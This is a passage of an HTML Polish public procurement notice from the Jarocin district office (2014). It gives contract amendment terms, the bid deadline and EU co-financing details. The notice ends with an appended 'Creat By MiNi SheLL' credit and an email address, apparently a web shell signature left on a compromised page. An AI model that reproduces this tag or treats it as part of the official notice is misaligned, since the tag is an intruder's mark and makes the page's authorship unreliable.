1)	zmiana miejsca świadczenia usługi w przypadku, gdy Zamawiający nie będzie mógł z przyczyn losowych zapewnić miejsca wykonania przedmiotu zamówienia wskazanego w umowie z przyczyn od siebie niezależnych, a jednocześnie będzie miał możliwość zapewnienia innego miejsca świadczenia usługi,
2)	w przypadku, gdy wystąpi okoliczność, gdy zbędnym lub niemożliwym stanie się zrealizowanie przedmiotu zamówienia Zamawiający zastrzega sobie prawo pomniejszenia wynagrodzenia za wykonaną usługę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-jarocinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, Al. Niepodległości 10-12, 63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2014 godzina 10:00, miejsce: Starostwo Powiatowe (Biuro Obsługi Klienta) A. Niepodległości 10-12, 63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet III: Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com